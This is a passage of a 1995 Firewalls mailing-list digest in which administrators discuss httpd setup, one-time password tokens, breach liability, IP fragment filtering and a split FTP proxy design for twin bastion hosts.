>It is available at ftp.ncsa.uiuc.edu. > > > >Some recommendations when setting up a httpd server is make sure it is > >running as nobody in the configuration files and if possible, run it > >in a chroot environment. > > NCSA _what_? HTTP server? Mosaic? Telnet for Mac or Windows? NCSA (the > National Center for Supercomputer Applications) produces _lots_ of > different software packages. Since within my message I referenced httpd several times, I thought it was self-explainatory, but if not and to make sure we have no doubt, I was talking about the NCSA 1.4 httpd server. Cheers, Christopher -- Christopher William Klaus Voice: (404)441-2531. Fax: (404)441-2431 Internet Security Systems, Inc. Computer Security Consulting 2000 Miller Court West, Norcross, GA 30071 ========================< http://iss.net/~iss >========================= From firewalls-owner Tue May 9 15:39:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03330 for firewalls-outgoing; Tue, 9 May 1995 15:27:28 -0700 Received: from ecua.net.ec (ecua.net.ec [157.100.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA03320 for ; Tue, 9 May 1995 15:27:22 -0700 Received: by ecua.net.ec (AIX 3.2/UCB 5.64/4.04) id AA14810; Tue, 9 May 1995 17:21:52 -0500 X-Nupop-Charset: English Date: Tue, 9 May 1995 17:16:07 -0500 (EST) From: "Mauricio A. Echeverr!a." Reply-To: mae@gu.pro.ec Message-Id: <62172.mae@gu.pro.ec> To: Firewalls@GreatCircle.Com Subject: Previous mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message was sent due to a glitch in my mail system. Apologies to all. It was destined to be edited and sent as a reply to the person who asked about using the same password file across all his unix machines. Unfortunately mail lost in the glitch means I no longer have the address to go with the reply. Sorry again for any inconvenience caused, Rufus, Consulting at Consulta... A bear of Very little brain. From firewalls-owner Tue May 9 16:06:22 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03546 for firewalls-outgoing; Tue, 9 May 1995 15:35:07 -0700 Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA03540 for ; Tue, 9 May 1995 15:35:03 -0700 Received: from fcbbs.UUCP by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA29372 for ; Tue, 9 May 95 18:26:19 -0400 Received: from KPMG (Radnor) (FirstClass[2000111]) by fcbbs.ss.kpmg.com (PostalUnion/UUCP 1.0.9a) id AA2000111.2882888131; Tue, 09 May 1995 17:24:01 EST Message-Id: <1995May09.181531.2882888131@fcbbs.ss.kpmg.com> To: Firewalls@greatcircle.com From: Post_Office@fcbbs.ss.kpmg.com Organization: Strategic Services of KPMG Peat Marwick Date: Tue, 09 May 1995 18:15:31 EST Subject: NDN: Firewalls-Digest V4 #293 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: Michael VanStrien (-49) *************************************************************************** This e-mail message was sent from the KPMG Knowledge Manager. The information contained in this e-mail message is privileged and confidential. It is intended for the use of the addressee listed above. Technical Support (610) 995-4419 *************************************************************************** From firewalls-owner Tue May 9 16:20:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA04199 for firewalls-outgoing; Tue, 9 May 1995 15:53:22 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA04188 for ; Tue, 9 May 1995 15:53:18 -0700 Received: from [198.115.177.226] (slip-0-26.shore.net) by northshore.ecosoft.com with SMTP id AA28671 (5.67a/IDA-1.5 for ); Tue, 9 May 1995 18:53:43 -0400 Message-Id: <199505092253.AA28671@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 8 May 1995 17:58:40 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: Re: One Time Password Tokens Cc: ken@vnet.ibm.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken Paquette queried: >Or does anybody have any information on >CRYPTOCard, Inc. >1649 Barclay Blvd. >Buuffalo Grove, IL. ================= One helpful source: Arnold Consulting, Inc. 2530 Targhee Street, Madison, Wisconsin 53711-5491 U.S.A. Phone : 608-278-7700 Fax: 608-278-7701 Email: Stephen.L.Arnold@Arnold.Com Product: CRYPTOCard. Suerte, _Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''' From firewalls-owner Tue May 9 16:40:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA04238 for firewalls-outgoing; Tue, 9 May 1995 15:53:41 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA04226 for ; Tue, 9 May 1995 15:53:37 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8yAK-0002JZC; Tue, 9 May 95 15:54 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA22749; Tue, 9 May 1995 15:54:09 +0800 Date: Tue, 9 May 1995 15:54:09 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505092254.AA22749@brittany.oes.amdahl.com> To: amolitor@anubis.network.com, swb@aurora.phys.utk.edu Subject: Re: Formal methods (formerly 'Source Code') Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII content-length: 1011 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > There's a big difference between proof and truth which stems from the > assumptions taken as axiomatically true a priori. Regarding firewalls it > implies that no matter how well the if-then chain of logic proves things > are safe the truth is that software has bugs. > > Oh please, couldn't we let this thread die? It's not providing us with anything of any value anymore. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Tue May 9 17:39:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07230 for firewalls-outgoing; Tue, 9 May 1995 17:22:45 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA07225 for ; Tue, 9 May 1995 17:22:42 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.6.12/8.6.12) id BAA26830; Wed, 10 May 1995 01:22:51 +0100 From: Steve Kennedy Message-Id: <199505100022.BAA26830@ford.gbnet.org> Subject: Re: One Time Password Tokens To: ken@VNET.IBM.COM (Ken Paquette) Date: Wed, 10 May 1995 01:22:51 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505091949.AA36816@btv.ibm.com> from "Ken Paquette" at May 9, 95 03:49:17 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 709 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Ken Paquette > Or does anybody have any information on > CRYPTOCard, Inc. > 1649 Barclay Blvd. > Buuffalo Grove, IL. err sort of. They make a VERY nice card, can store multiple PINs, then challenge/response DES card. you can also CAHNGE the batteries .... I'll try and dig out the details tomorrow ... Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Tue May 9 18:09:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07729 for firewalls-outgoing; Tue, 9 May 1995 17:56:55 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07723 for ; Tue, 9 May 1995 17:56:51 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18353; Tue, 9 May 95 20:46:17 -0400 Date: Tue, 9 May 95 20:46:17 -0400 Message-Id: <9505100046.AA18353@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Civil liability Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >We are analyzing the potential costs of a security breach. One of the >questions we are considering is the liability that may be incurred qwith >various types of unauthorized behavior. Not a lawyer (yet) but some phrases do come to mind: "culpable negligence" is the first, "aiding and abeting" is another, "maintaining an atractive nuisance" is a third, "failure to exercise due care" for four. Depends on whether the shyster is paid by the state, a victim, or a shareholder. Might also consider that in a civil suit, all that is necessary is for someone to demonstrate injury (not necessarily physical) and for you to have the "deep pockets". Isn't this a wonderful country ? Warmly, Padgett From firewalls-owner Tue May 9 18:39:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08105 for firewalls-outgoing; Tue, 9 May 1995 18:18:23 -0700 Received: from silas.cc.monash.edu.au (silas.cc.monash.edu.au [130.194.1.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA08100 for ; Tue, 9 May 1995 18:18:19 -0700 Received: (sajoh3@localhost) by silas.cc.monash.edu.au (8.6.10/8.6.4) id LAA29850; Wed, 10 May 1995 11:18:47 +1000 Date: Wed, 10 May 1995 11:18:45 +1000 (EST) From: Mr SA Johnson Subject: Advice For Setting Up A Firewall. - Please Help. To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm in the decision making process of which firewall software I go with. Now I am also very flexable when it comes to a particular Operating System. Does anyone have any advice on which Unix Operating Systems have coped well in the past with Firewalls / software. Is there any particular OS that is favored by the Firewall community for being more secure or having more firewall and security applications developed for it? I am currently reading the FAQ and have disseminated much information from anonymous ftp sites but it really doesn't tell me what the community is doing and which software does what and what software is better than others. Any comments / advice on this would be appreciated. Regards Simon Johnson From firewalls-owner Tue May 9 18:52:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08122 for firewalls-outgoing; Tue, 9 May 1995 18:20:02 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA08117 for ; Tue, 9 May 1995 18:19:58 -0700 Received: from anubis.network.com (anubis-e3.network.com) by nsco.network.com (4.1/1.34) id AA01981; Tue, 9 May 95 20:38:16 CDT Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA20766; Tue, 9 May 95 20:19:31 CDT Date: Tue, 9 May 95 20:19:31 CDT From: amolitor@anubis.network.com (Andrew Molitor) Message-Id: <9505100119.AA20766@anubis.network.com> To: firewalls@greatcircle.com Subject: Re: IP packet filtering... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What I've done for the packet filtering work I am doing is this: Any pattern which requires data not present in the datagram in hand does not match. Thus, if the TCP flags are not in the first datagram, a filter of the form: .. stuff .. tcp_connect_request ; .. stuff .. will not do to the first fragment, since it is logically NOT a tcp_connect_request. The flags will show up in, say, the 2nd frag, whereupon if the SYN is set and the ACK is not, the actions will be taken with respect to that packet. This seemed to me to be the easiest solution, it's relatively easy to use an abstraction that understands the idea of 'Nth byte after the beginning of the transport layer header' and to teach that abstraction about fragments is a no-brainer, so we handle flags by simply asking for the 13th byte, and if it's not there, the answer to all questions about that byte ('is it between 0 and 255?' 'is the 3rd bit set?') is 'no'. I think this does make the semantics a little complicated, but not any more complicated than anything else -- the fact is that IP fragments and you have to deal with that if you don't want to do reassembly just to filter. Andrew From firewalls-owner Tue May 9 22:39:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA11291 for firewalls-outgoing; Tue, 9 May 1995 22:16:10 -0700 Received: from gateway.wipsys.soft.NET (gateway.wipsys.soft.net [164.164.1.25]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA11286 for ; Tue, 9 May 1995 22:16:05 -0700 Received: (from acharya@localhost) by gateway.wipsys.soft.NET (8.6.9/8.6.9) id FAA01345 for firewalls@greatcircle.com; Wed, 10 May 1995 05:24:12 GMT From: Atul Acharya Message-Id: <199505100524.FAA01345@gateway.wipsys.soft.NET> Subject: Off topic: Directory services, anybody.. ? To: firewalls@greatcircle.com Date: Wed, 10 May 1995 10:54:11 +0530 (IST) Organisation: Wipro Systems Address: 88, M.G. Road, Bangalore, 560-001, India Phone: 91-80-558-6202, 559-4028 FAX: 91-80-558-7984 X-Mailer: ELM [version 2.4 PL22] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 542 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks, Slightly off-topic here, but I am not sure where to search... Does anybody know of a publicly available directory-services software that can be installed on Unix/Dos/Windows ? Something like a client and a server where queries can be sent regarding E-mail address, phone #, etc. I believe there's something called "ph" available - is it some sort of directory-services stuff ? Would be glad if somebody could throw some light on this. All suggestions welcome! Please respond to my address: acharya@wipsys.soft.net Thanks, -atul From firewalls-owner Tue May 9 23:09:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA11443 for firewalls-outgoing; Tue, 9 May 1995 22:49:05 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA11438 for ; Tue, 9 May 1995 22:49:02 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s94eM-0000I6C; Tue, 9 May 95 22:49 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA22952; Tue, 9 May 1995 22:49:36 +0800 Date: Tue, 9 May 1995 22:49:36 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505100549.AA22952@brittany.oes.amdahl.com> To: alan@mid.net, firewalls@greatcircle.com Subject: Re: Announce: Firewall SNMP mailing list Content-Length: 1140 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Strangely enough, I just got this! For some reason it took 36 hours to get to me. I've joined the list at mid.net, and hope that we can have some fruitful discussions. Patrick >From firewalls-owner@GreatCircle.COM Tue May 9 19:03 PDT 1995 From: Alan Hannan Subject: Announce: Firewall SNMP mailing list To: firewalls@greatcircle.com Date: Mon, 8 May 1995 09:04:58 -0500 (CDT) Howdy. I have created a majordomo (Thanks Brent!) mailing list for the discussion of Firewall SNMP. It is my hope that this list can provide a forum through which a standardized SNMP MIB for firewalls can develop. I look forward to your discussions. subscribe: Send email to majordomo@mid.net with the text "subscribe fw-snmp" in the mailing list to send mail to the list: Send the mail to "fw-snmp@mid.net" -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Wed May 10 02:39:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14437 for firewalls-outgoing; Wed, 10 May 1995 02:10:51 -0700 Received: from mailer.cefriel.it (ercole.cefriel.it [131.175.5.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14428 for ; Wed, 10 May 1995 02:10:29 -0700 Received: from punto.cefriel.it by mailer.cefriel.it (4.1/SMI-4.1) id AA21158; Tue, 9 May 95 13:16:23+010 Received: by punto.cefriel.it (4.1/SMI-4.1) id AA22953; Tue, 9 May 95 12:17:44+010 From: verga@mailer.cefriel.it (Alberto Verga) Message-Id: <9505091117.AA22953@punto.cefriel.it> Subject: SECURITY META HOTLIST To: ids@uow.edu.au Date: Tue, 9 May 1995 12:17:44 +0100 (GMT+0100) Cc: Firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1311 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I'm trying to collect as much as possible links and pointers to _security related_ on-line documents, mailing list, books, newsgroups in order to make a SECURITY META HOTLIST, a sort of Pointers Library on security. I need information on: Security in general UNIX Security VIRUS Firewalls SNMPv2 Security Cryptography Security Architecture Electronic Commerce Commercial Vendors of SW and HW products on security The _SECURITY META HOTLIST_ will be posted in _JUNE_ to the following mailing list: www-security@ns2.rutgers.edu e-payment@cc.bellcore.com Firewalls@GreatCircle.COM bugtraq@fc.net ids@uow.edu.au www-buyinfo@allegra.att.com and the following newsgroups: sci.crypt alt.security unix.sys.adm ANY kind of help will be appreciated. Thank you in advance to all're gonna help me. P.S. Sorry for duplicating information to people subscribed to more than one of the above mailing list. -- ---------------------------------------------------------------------- Alberto Verga e-mail : verga@mailer.cefriel.it CEFRIEL - Politecnico di Milano Via Emanueli, 15 voice : +39-2-66100083 20126 Milano (Italy) fax : +39-2-66100448 ---------------------------------------------------------------------- From firewalls-owner Wed May 10 02:56:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14746 for firewalls-outgoing; Wed, 10 May 1995 02:36:41 -0700 Received: from relay2.pipex.net (relay2.pipex.net [158.43.128.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14741 for ; Wed, 10 May 1995 02:36:36 -0700 Received: from smtpgty.saicuk.co.uk by bath.pipex.net with SMTP (PP); Wed, 10 May 1995 10:36:52 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <2FB094AA@smtpgty.saicuk.co.uk>; Wed, 10 May 95 10:25:46 GMT From: "Johnson-Bryden, Ian" To: "'Firewalls@GreatCircle.COM'" Subject: RE: Liable for security Date: Wed, 10 May 95 08:21:00 GMT Message-ID: <2FB094AA@smtpgty.saicuk.co.uk> Encoding: 115 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: firewalls-owner >To: Firewalls >Subject: Liable for security >Date: 09 May 1995 15:42 >We are analyzing the potential costs of a security breach. One of the >questions we are considering is the liability that may be incurred qwith >various types of unauthorized behavior. >What legal problems could a company incur if: > 1. An employee posts offensive material? > 2. A cracker hid a trojan horse in materials the company > distributes? > 3. A cracker distributes copyrighted software from the company's > server? >There are many different angles, but the basic question is whether or >not there is a real risk of being held liable for damage done by elicit >changes to the company's computer system. > Does anyone know of relevant cases? > Can anyone refer me to useful reference material? The legal issues are largely pioneering and will vary from country to country. It may also depend on the nature/size/reputation of the corporations involved. Courts may consider relative levels of knowledge and the burden of proof is usually greater in criminal than in civil cases. Therefore a court may take the view that a company which has already considered, or adopted, technology such as a firewall already admits knowledge of all potential risks and has accepted responsibility for preventing them. The result could then be that in two actions which are functionally similar, the company which did not take any risk management actions suffers less than the company which spent a fortune on risk reduction technology that did not prevent the incident. I believe that someone has already observed that 'the law is a ass'. In a recent situation, Microsoft issued CD-ROMs to developers. Several developers claimed that the material was contaminated by hostile code. Microsoft appears to have admitted that the claims were correct, but blamed a third party which produced the CD-ROM copies. From a public statement I read, it seems that Microsoft just said that they would not use the third party again. There may have been a public statement or two which I did not see and this/these may have contained further information. However, it looks like Microsoft just brushed off this highly sensitive issue and no one took any further action. If that is the case, it may be that the affected developers (probably small companies) did not relish taking a large corporation through the courts. Equally, some covert compensation may have been paid on the condition that the recipient never talks about it to anyone.. There is a growing number of BBS groups which discuss legal and competence issues. These public discussions suggest that the incidence of risks of this nature is quite widespread. Generaly, the impression is that most folk still prefer to avoid using the courts and this may be wise because the legal systems in different countries are still struggling to deal with post 'quill pen' technologies. There is also the question of corporate sensitivity/business reputation. Most corporations still seem to believe that even a successful court action can result in collateral damage. The real winners of any court action tend to be the lawyers. During the long (often very very long) period from starting an action to final victory, the corporation bringing the action has to commit valuable resources to support the action. In civil actions there is always the danger that the plaintiff has to accept a discounted sum hours before the trial and this may be less than 20% of the total costs and damage. If the action does go to trial, the final settlement is unlikely to recognise this considerable expense. Victory is therefore rarely complete, however cupable the defendant. There is also the matter of reputations. The corporation damaged by the actions or inactions of another corporation may eventually win in court but, during the period to the victory, the corporate reputation may be severely damaged. You only have to look back through some of the reactions on this list to stories of organisations which have suffered some form of damage. Many people will take the view that however negligent or criminal the organisation found at fault, the victim is ridiculed by his peers for allowing himself to be in the position. Thats not unlike rape cases, where the court verdict has little benefit to the reputation of the victim. We all know that the victim asked to be hit unless that victim happens to be us. If human nature was different there would be a lot of news programmes and tabloid papers going out of business. It is therefore not entirely surprising that victims are reluctant to step forward and warn the rest of us of particular risks or take legal action to recover damages or stop a repeat incident. As the law in most, probably all, countries has not caught up with technology, the courts are even more of a lottery than usual. However, every corporation is open to legal attack in the areas detailed by the questions above. That risk is in at least two categories. Firstly, most civil and criminal legal systems would allow one party to take action against another where it is claimed that negligence made damage by a third party possible. How successful such an action would be is open to question and will depend on the specific circumstances, the national legal system being used, and probably heavily on the court personalities involved in a specific case. Secondly, any organisation may risk a legal attack which is never intended to achieve a victory in court. I am aware (having been engaged as an expert witness by one party) of incidents where the objective of one party in a court action was to blackmail the other party into agreeing to an 'out-of-court' settlement which was unusually favourable and unlikely to be the result in continuing through trial. In this situation, the largest corporation may win because it believes that PR damage is not going to be a major factor to them and the other smaller corporation cannot fund an effective legal defence/attack. Sometimes a small corporation may win this way because it has little reputation to hazard but the other party could suffer considerable damage to reputation. An additional factor may be that the senior officers of some corporations consider it 'macho' to have a long list of legal actions against them pending. Ian J-B From firewalls-owner Wed May 10 05:39:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16360 for firewalls-outgoing; Wed, 10 May 1995 05:25:48 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16355 for ; Wed, 10 May 1995 05:25:43 -0700 Message-Id: <199505101225.FAA16355@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA258588870; Wed, 10 May 1995 22:27:50 +1000 From: Darren Reed Subject: Re: IP Packet Filtering To: danny@BouletFermat.ab.ca (Danny Boulet) Date: Wed, 10 May 1995 22:27:50 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199505091701.LAA02644@nahanni.BouletFermat.ab.ca> from "Danny Boulet" at May 9, 95 11:01:01 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1131 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Danny Boulet, they said: [...] > I will concede that, in theory, this implementation is broken (i.e. it could > reject a packet that shouldn't be rejected). I contend that, in practice, > the implementation is correct since packets aren't fragmented into pieces > that > are so small that the TCP flags appear in the second fragment. If someone > sends you fragments that are so short that the TCP flags don't make it into > the first fragment then either the sender is trying to do something weird > or it is going to take an absurd number of fragments to get any reasonable > amount of data through to you. In practice, I've done it. If I can do it, then crackers can do it. And have probably been doing it for longer than I have. Crackers *ARE* going to try and do weird things. It is the job of the firewall software to deal with and neutralise this threat. Depending on how your firewall package behaves, I may have to fragment many packets or just a few. And I may not need to send a lot either. How many packets did "mitnick" need to send in order to get his IP spoofing attack to work ? darren From firewalls-owner Wed May 10 05:57:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16297 for firewalls-outgoing; Wed, 10 May 1995 05:10:20 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16292 for ; Wed, 10 May 1995 05:10:16 -0700 Message-Id: <199505101210.FAA16292@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA253377868; Wed, 10 May 1995 22:11:08 +1000 From: Darren Reed Subject: Re: Linux as multi-homed firewall... (fwd) To: marekm@i17linuxb.ists.pwr.wroc.pl (Marek Michalkiewicz) Date: Wed, 10 May 1995 22:11:08 +1000 (EST) Cc: firewalls@greatcircle.com Reply-To: avalon@coombs.anu.edu.au In-Reply-To: <199505092000.WAA18835@i17linuxb.ists.pwr.wroc.pl> from "Marek Michalkiewicz" at May 9, 95 10:00:46 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1273 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Marek Michalkiewicz, they said: > > > I posted this mail elsewhere, and I'm doing it again here for user > > education. Sorry to those who see it twice. Maybe I should/could post > > it to bugtraq (even instead of), but the point I'm trying to make is > > one centred on bugs, but on choice of software for firewalls and the > > quality thereof. Someone who uses linux might want to file a bug > > report if they think it's serious enough. > > This bug is fixed now, see ftp://ftp.linux.org.uk/pub/tmp/ipsizefix-1.2.8 > for a patch. > > No OS is completely bug free, and we all know that. > > It is easy to just complain that "Linux is buggy" but, unfortunately, > this doesn't make it any less buggy... Instead, please report bugs > in Linux to the appropriate mailing lists: [...] Like I said, I don't care for Linux nor do I use it. But I do care about those who run/setup firewalls and who need to know about such "bugs". My concern isn't that Linux is "buggy", but that it is "buggy" in an area where it can't afford to be buggy if used in an environment such as that a firewall is in. When you find a bug in less than 30 seconds of looking at the source for the first time, you can't help but wonder why nobody else has. cheers, Darren From firewalls-owner Wed May 10 06:09:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16801 for firewalls-outgoing; Wed, 10 May 1995 06:05:53 -0700 Received: from taureau.as03.bull.oz.au (taureau.as03.bull.oz.au [134.211.128.112]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16789 for ; Wed, 10 May 1995 06:05:44 -0700 Received: by taureau.as03.bull.oz.au id AA28370 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 10 May 1995 23:05:52 +1000 Received: from localhost (localhost [127.0.0.1]) by zen.void.oz.au (8.6.10/8.6.9) with SMTP id WAA28299; Wed, 10 May 1995 22:45:00 +1000 Message-Id: <199505101245.WAA28299@zen.void.oz.au> X-Authentication-Warning: zen.void.oz.au: Host localhost didn't use HELO protocol To: cwerner@hsdemo.merit.edu (Christopher L. Werner) Cc: firewalls@greatcircle.com Subject: Re: ftp through 2 dual-homed bastions In-Reply-To: Your message of "Mon, 08 May 95 23:48:19 EST." <199505090342.XAA14939@hostserver.merit.edu> Date: Wed, 10 May 1995 22:44:59 +1000 From: "Simon J. Gerraty" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > About a month ago ftp through a firewall was discussed. Things seemed to > gravitate toward ftp clients which supported PASV including some of the web > browsers. > > Telnet and http can be accomplished with plug-gw but how do I do ftp. Would > tcp-wrapper help? Nope. You want a split ftp-proxy as described in C&B. And since I've just shot my mouth off in the fwtk list I might as well do it here to :-) And yes I hope to have unfs packaged up this weekend... [repeated message below...] The real answer is a split ftp proxy as described in C&B. I have modified the TIS ftp-gw to do just this plus added an external bindport facility (also described in C&B) so the the ftp proxies can run non-root and still use reserved ports - lets you use more restrictive acl's on the choke router. I'm busy packaging up my unfs too, but I'll shar up ftp-gw2 this weekend. The README file is below for those in the same boat. --sjg FTP-GW2 This is the TIS ftp-gw hacked by Simon J. Gerraty to support a twin bastion firewall (with a choke router between the two bastions). How it works: [client]---C--->[ftp-igw]----C--->[ftp-ogw]----C--->[server] ^---D---- ----D----^ ^----D---- C Control session D Transient Data session ftp-igw is started by inetd on the internal bastion in response to a call from "client". ftp-igw, does pre-authentication of "client". What I mean here is that it checks that "client" is allowed to use the proxy. It cannot at this stage check if "client" is allowed to ftp to "server", that check is made by ftp-ogw. Actually ftp-ogw checks only that "server" is an allowed destination. Spliting the authentication this way, allows the proxies to be simpler and avoids the need for ftp-igw to be able to resolve "server" and for ftp-ogw to be able to resolve "client". The downside is that you cannot specify that some systems can call "server" but others cannot. If this seems a major limitation I can address it, but I think the above should be adequate and can be implemented much more easily. Note that I've modified the log entries so that the logs from ftp-igw can be matched with those from ftp-ogw thus allowing matching of client and server. To do the complete check would require something like, passing client's IP address though to ftp-ogw, or allowing DNS traffic through choke. A common reason for needing a split firewall like this is to hide a bunch of illegal nets on the inside. In such cases DNS traffic cannot be allowed through the firewall at all. I've avoided any reliance on being able to resolve outside on the inside etc. If "client" is ok, ftp-igw calls ftp-ogw on the FTP_GW port and pass any user@dest [port] etc if given on the command line, or simply enter its main loop and let "client" issue a "user" command etc. Once ftp-ogw has the "user@dest" it checks that "dest" is ok, and attempts a connection. Most of what happens then is exactly as for the original TIS ftp-gw with ftp-ogw doing 99% of 